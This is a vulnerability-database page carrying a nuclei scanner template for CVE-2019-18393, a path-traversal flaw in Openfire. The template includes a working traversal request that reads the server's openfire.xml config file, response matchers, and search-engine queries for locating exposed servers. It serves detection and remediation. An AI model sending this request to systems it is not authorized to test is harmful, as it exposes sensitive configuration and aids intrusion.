Lucene search
K

Ignite Realtime Openfire <4.42 - Local File Inclusion

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Ignite Realtime Openfire <4.42 - LFI via PluginServlet.java, allows unauthorized access to sensitive info, RCE, and compromise of affected system

Related
Refs
Code
id: CVE-2019-18393

info:
  name: Ignite Realtime Openfire <4.42 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability.
  reference:
    - https://github.com/igniterealtime/Openfire/pull/1498
    - https://swarm.ptsecurity.com/openfire-admin-console/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18393
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-18393
    cwe-id: CWE-22
    epss-score: 0.13945
    epss-percentile: 0.96092
    cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: igniterealtime
    product: openfire
    shodan-query:
      - http.title:"openfire admin console"
      - http.title:"openfire"
    fofa-query:
      - title="openfire"
      - title="openfire admin console"
    google-query:
      - intitle:"openfire"
      - intitle:"openfire admin console"
  tags: cve,cve2019,openfire,lfi,igniterealtime,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "org.jivesoftware.database.EmbeddedConnectionProvider"
          - "Most properties are stored in the Openfire database"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207f9261d99b0bf5b276a6ba3059f1d113f35f638d6123fe857a7b4ba6633b43f2022100d015a03bebe44e0e2aedea55dcaf1ff7cba2bd6c560e3ad41e2b5a8bf9ad56fd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 25
CVSS 3.15.3
EPSS0.13945
21